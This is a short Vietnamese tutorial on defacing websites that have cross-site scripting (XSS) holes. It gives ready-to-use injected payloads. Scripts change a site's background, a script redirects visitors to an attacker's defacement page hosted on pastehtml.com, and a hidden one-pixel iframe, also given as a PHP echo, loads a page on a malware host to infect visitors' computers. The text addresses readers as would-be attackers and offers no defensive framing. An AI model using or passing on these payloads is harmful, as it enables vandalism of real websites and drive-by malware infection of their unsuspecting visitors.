Deface website with XSS

XSS (Cross Site Scripting) là một trong những cách thức phổ biến để hack một website. Khi một trang web bị lỗi XSS, hacker có thể dựa vào lỗi này để chèn các đoạn mã độc JavaScript, VBScript, ActiveX, HTML, hoặc Flash. Trong bài viết này, tôi sẽ giới thiệu với các bạn một số cách thức đơn giản để Deface một website khi chúng ta đã biết trang đó bị lỗi XSS.

Thay đổi màu của background

[code type="Javascript"]<script>document.body.bgcolor="màu bất kỳ";</script>[/code]

VD:

[code]http://targetsite.com/<script>document.body.bgcolor="red";</script>[/code]

Thay đổi hình nền:

[code]<script>document.body.background="http://hình của bạn.jpg";</script>[/code]

Deface bằng Pastehtml

Trước tiên, bạn upload trang deface của mình lên Pastehtml và sau đó lấy link. Khi bạn tìm được trang nào bị lỗi XSS thì bạn đánh đoạn script sao vào URL:

[code]<script>window.location="http://pastehtml.com/link_deface_mà_bạn_đã_upload";</script>[/code]

Đoạn script sẽ redirect đến trang deface của bạn đã upload.

Deface bằng iframe

Trong thẻ iframe, hacker có thể chèn malware vào website bằng XSS. Nếu như có người dùng nào đó truy cập vào website này thì sẽ redirect đến trang web chứa malware, khi đó máy tính của người dùng sẽ bị dính malware.

Đầu tiên thì attacker cần tìm trang web bị lỗi XSS. Sau đó tìm kiểm tra thử có thể insert với thẻ iframe không. Nếu thành công thì attacker sẽ đoạn script sau vào URL:

[code]<iframe scr="http://malware.com/web.html" width=1 height=1 style:"visibility:hidden;position=absolute"></iframe>[/code]

Đối với các trang web bằng PHP thì:

[code]echo "<iframe src=\"http://target/index.html\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>[/code]